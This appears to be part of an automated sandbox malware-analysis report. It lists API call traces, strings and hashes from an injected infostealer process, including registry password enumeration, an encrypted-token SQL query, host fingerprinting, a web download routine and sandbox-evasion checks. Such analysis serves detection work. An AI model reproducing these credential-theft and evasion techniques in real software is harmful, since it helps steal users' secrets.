lstrcatA.KERNEL32(33A67020,00000000,00000000), ref: 00407648
lstrcatA.KERNEL32(33A67020, : ), ref: 0040765A
lstrcatA.KERNEL32(33A67020,00000000,00000000,00000000), ref: 0040768F
lstrcatA.KERNEL32(33A67020,00421804), ref: 004076A0
lstrcatA.KERNEL32(33A67020,00000000,00000000,00000000), ref: 004076D3
lstrcatA.KERNEL32(33A67020,00421808), ref: 004076ED
task.LIBCPMTD ref: 004076FB

Strings

: , xrefs: 0040764E

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: 7d0423256a728e891f6393d8e936e2c81fa5f6b6a39ee4f482e2bec68b02cab5
Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
Opcode Fuzzy Hash: 7d0423256a728e891f6393d8e936e2c81fa5f6b6a39ee4f482e2bec68b02cab5
Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66

Function 004072D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407314
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459

Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B

task.LIBCPMTD ref: 00407555

Strings

Password, xrefs: 00407401

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5

Function 00417500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
HeapAlloc.KERNEL32(00000000), ref: 0041760A
wsprintfA.USER32 ref: 00417640

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Strings

C, xrefs: 0041754C
:, xrefs: 0041755C
\, xrefs: 00417560

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: ed3ca360dd794ca93df171aa1d69aa55e8069c6d35c7c4129d84d5da30dc5272
Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
Opcode Fuzzy Hash: ed3ca360dd794ca93df171aa1d69aa55e8069c6d35c7c4129d84d5da30dc5272
Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

Function 00414780 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,01342DF8,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000), ref: 00414801
lstrcatA.KERNEL32(?,?), ref: 00414820
lstrcatA.KERNEL32(?,?), ref: 00414834
lstrcatA.KERNEL32(?,013344D8), ref: 00414847
lstrcatA.KERNEL32(?,?), ref: 0041485B
lstrcatA.KERNEL32(?,01342740), ref: 0041486F

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F

Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD

Strings

0aA, xrefs: 004148F9, 004148A1, 004148A4

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID: 0aA
API String ID: 167551676-2786531170
Opcode ID: 68b14d5b17c671e2cf7e1b8e16a29c460b7c871aa3e1514749b126a2a2b0c466
Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
Opcode Fuzzy Hash: 68b14d5b17c671e2cf7e1b8e16a29c460b7c871aa3e1514749b126a2a2b0c466
Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99

Function 00418100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01342CA8,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,01342CA8,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
__aulldiv.LIBCMT ref: 00418172
__aulldiv.LIBCMT ref: 00418180
wsprintfA.USER32 ref: 004181AC

Strings

@, xrefs: 0041814D
%d MB, xrefs: 004181A3

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9

Function 0040BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D

lstrlenA.KERNEL32(00000000), ref: 0040BC9F

Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
lstrlenA.KERNEL32(00000000), ref: 0040BDA5
lstrlenA.KERNEL32(00000000), ref: 0040BDB9

Strings

AccountTokens, xrefs: 0040BABA
AccountTokens, xrefs: 0040BB49
SELECT service, encrypted_token FROM token_service, xrefs: 0040BBEB
AccountId, xrefs: 0040BCC4

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 1440504306-1079375795
Opcode ID: 004e0db66be2d3a03ffd53c2b276bb91953d66d2390156e59a6c43dc22011545
Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
Opcode Fuzzy Hash: 004e0db66be2d3a03ffd53c2b276bb91953d66d2390156e59a6c43dc22011545
Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA

Function 00404FB0 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00404FD1
InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
InternetCloseHandle.WININET(00415EDB), ref: 004050B9
InternetCloseHandle.WININET(?), ref: 004050C6

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
String ID:
API String ID: 1008454911-0
Opcode ID: 6cf967ef785bb23c697623f5c6a033393d0fc44cd8035483208646c558320f55
Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
Opcode Fuzzy Hash: 6cf967ef785bb23c697623f5c6a033393d0fc44cd8035483208646c558320f55
Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99

Function 004169F0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0132F238), ref: 004198A1
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0132F2F8), ref: 004198BA
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0132F340), ref: 004198D2
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0132F388), ref: 004198EA
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0132F268), ref: 00419903
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01332F28), ref: 0041991B
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01332B68), ref: 00419933
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01332AE8), ref: 0041994C
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0132F3A0), ref: 00419964
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0132F3B8), ref: 0041997C
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0132F3D0), ref: 00419995
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0132F4C0), ref: 004199AD
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,01332C88), ref: 004199C5
Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0132F568), ref: 004199DE

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 004011D0: CreateDCA.GDI32(0133A978,00000000,00000000,00000000), ref: 004011E2
Part of subcall function 004011D0: GetDeviceCaps.GDI32(?,0000000A), ref: 004011F1
Part of subcall function 004011D0: ReleaseDC.USER32(00000000,?), ref: 00401200
Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211

Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E

Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143

Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294

Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774

GetUserDefaultLCID.KERNEL32 ref: 00416A26

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6

Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F

Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0133AAB8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
CloseHandle.KERNEL32(00000000), ref: 00416AF9
Sleep.KERNEL32(00001770), ref: 00416B04
CloseHandle.KERNEL32(?,00000000,?,0133AAB8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
ExitProcess.KERNEL32 ref: 00416B22

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
